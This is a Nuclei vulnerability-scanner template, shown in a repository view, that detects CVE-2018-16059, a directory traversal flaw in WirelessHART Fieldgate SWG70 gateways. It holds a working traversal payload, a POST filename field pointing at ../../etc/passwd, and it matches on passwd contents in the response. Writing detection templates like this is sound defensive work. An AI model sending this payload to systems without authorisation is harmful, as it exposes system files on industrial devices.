nuclei-templates/cves/2018/CVE-2018-16059.yaml

28 lines
678 B
YAML
Raw Normal View History

2021-07-19 10:16:19 +00:00
id: CVE-2018-16059
info:
name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
author: daffainfo
2021-07-19 18:45:32 +00:00
severity: medium
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2018-16059
- https://www.exploit-db.com/exploits/45342
2021-07-19 10:16:19 +00:00
tags: cve,cve2018,iot,lfi
requests:
- method: POST
path:
- "{{BaseURL}}/fcgi-bin/wgsetcgi"
body: 'action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand'
matchers-condition: and
matchers:
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0"
2021-07-19 10:16:19 +00:00
part: body
- type: status
status:
- 200